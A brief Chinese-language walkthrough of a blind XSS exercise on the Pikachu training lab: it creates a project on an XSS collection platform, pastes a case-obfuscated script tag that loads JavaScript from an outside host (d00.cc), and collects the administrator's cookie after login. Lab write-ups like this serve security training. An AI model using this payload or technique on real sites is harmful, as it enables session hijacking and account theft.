一、网址:XSS平台登录 二、获取步骤 1.创建项目test 2.我的项目:test -->查看配置代码 3.复制js代码 <sCRiPt sRC=//d00.cc/3Gm></sCrIpT> 4.Pikachu-xss中的xss-盲打靶场 http://127.0.0.1/pikachu-master/vul/xss/xssblind/admin_login.php Jscript恶意代码粘贴进去 5.后台登录 6.平台获得信息 7.获取cookie